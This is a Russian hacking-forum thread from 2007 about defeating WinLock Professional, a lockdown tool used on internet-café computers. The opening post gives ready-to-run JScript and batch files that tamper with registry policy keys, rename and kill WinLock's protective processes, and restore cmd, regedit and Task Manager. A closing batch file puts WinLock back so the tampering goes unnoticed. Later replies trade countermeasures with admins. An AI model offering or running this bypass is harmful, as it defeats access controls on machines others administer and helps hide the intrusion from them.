Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   АнтиАдмин (https://forum.antichat.xyz/forumdisplay.php?f=20)
-   -   WinLock Professional (https://forum.antichat.xyz/showthread.php?t=55812)

mind 15.12.2007 00:46
WinLock Professional
 
На днях в интернет-кафе столкнулся с такой противной программулиной WinLock Professional 4.6 (О ней упоминали вот здесь http://forum.antichat.ru/thread48982.html). Парился целый час, но потушить ее так и не удалось. Решение пришло уже дома, когда скачал последнюю версию программы с официального сайта http://www.crystaloffice.com/ru и начал эксперименты в более благоприятных условиях. Оно оказалось очень простым, но я все же решил поделиться им, может кому пригодиться.

Настройка программы админом заключается в расстановке флажков:
Вкладка Общие.
Защита:
Включить защиту;
Настройки:
Включить защиту при загрузке;
Мониторинг системы;
Защита от выгрузки;
Вкладка Система.
Безопасность:
Скрывать свойство папки;
Скрывать свойство дисплея;
Запретить обновление Windows;
Запретить редактор реестра;
Запретить диспетчер задач;
Запретить смену пароля;
Запретить консоль cmd.exe;
Запретить безопасный режим;
Запретить панель управления;
Запретить блокировку компьютера;
Запретить установку и удаление программ;
Меню Пуск и панель задач:
Снимаем галочку с пункта Выполнить;
Снимаем галочку с пункта Смена пользователя;
Запретить настройку панели задач;
Рабочий стол:
Запретить Active Desktop;
Запретить переименование ярлыков на рабочем столе;
Запретить фоновый рисунок HTML;
Запретить изменение фонового рисунка;
Диски:
Снимаем галочку с системного диска в нашем случае это диск C:\
Файл: здесь добавляем следующий файл
C:\WINDOWS\system32\gpedit.msc
Галочку разрешить чтение не ставить! Жмем OK. Итак прога настроена и готова к обороне... И так приступим...

В более ранних версиях вобще отсутствовал какой либо контроль за состоянием процесса и его можно было выгрузить любым сторонним диспетчером задач, также отсутствовал надзор за изменением реестра. В версии 4.6 эти недостатки были исправлены однако не пользы от этого больше не стало. Наша цель выгрузить процесс WinLock'a, а точнее процессы: wlg.exe и winlock.exe. Функции первого и есть защита от выгрузки второго процесса =).

Пишем скрипт на jscript (или vbs кому как нравиться) и сохраняем как go.js:


Код:
var WSHShell = WScript.CreateObject("WScript.Shell");
// Так как не проверяется тип ключа, а только его наличие изменяем
// его тип с DWORD на REG_SZ и включаем обработку bat файлов)
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD","Fuck!");
// Дублирование необходимо
// При желании здесь можно выставить небольшую задержку
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD","Fuck!");
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD","Fuck!");
// Запустим батник который выгрузит процессы WinLok'a
WSHShell.Run("kill.bat");
WScript.Sleep(1000);
// Теперь можно делать с виндой все что не взбредет в голову
// Включаем свойство папки
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions",0,"REG_DWORD");
// Разрешаем редактор реестра
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\DisableRegistryTools",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\DisableRegistryTools",0,"REG_DWORD");
// Включаем диспетчер задач
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD");
Пишем вот такой батник kill.bat
Код:
rename "C:\Program Files\WinLockPro\wlg.exe" die.exe
taskkill /IM wlg.exe /T /F
rename "C:\Program Files\WinLockPro\winlock.exe" die_.exe
taskkill /IM winlock.exe /T /F
Теперь в твоем распоряжении командная строка, редактор реестра,диспетчер задач - вобщем полный боекомплект =) осталось только добавить немного фантазии...
Как все свои дела сделал обязательно уберись за собой =) по отношению к винлоку делается это опять таки с помощью батника:
Код:
rename "C:\Program Files\WinLockPro\die.exe" wlg.exe
rename "C:\Program Files\WinLockPro\die_.exe" winlock.exe
start "C:\Program Files\WinLockPro\wlg.exe"
start "C:\Program Files\WinLockPro\winlock.exe"
Вот собственно и все )))

heks 17.12.2007 16:47
будет грамотный админ сделает запуск *.js скриптов как txt файлов

mind 06.01.2008 03:54
Да ты прав, но обычно админы не тока грамотные но ОЧЕНЬ ленивые люди :) в конце концов ничего не мешает взять сторонний редактор реестра и вклбчить обработку js.
Не думаю что WinLock контролирует эти параметры. Тем болие полностью защитить реестр от изменений не возможно, в противном случае он теряет свой смысл, хотябы у системы должен быть к нему доступ.

SHYLLER 08.01.2008 10:03
а просто запоролить?

mind 12.01.2008 02:15
а кого поролить то?

heks 12.01.2008 14:14
как ты в реестр попадешь если все в винблоке заблокировать можно ?

mind 14.01.2008 05:50
Элементарно )) винлок блокирует редактор реестра но не сам реестр, привилегии system ему никто не даст... кому нужна нерабочая винда??? Может видео снять? :D


Время: 22:32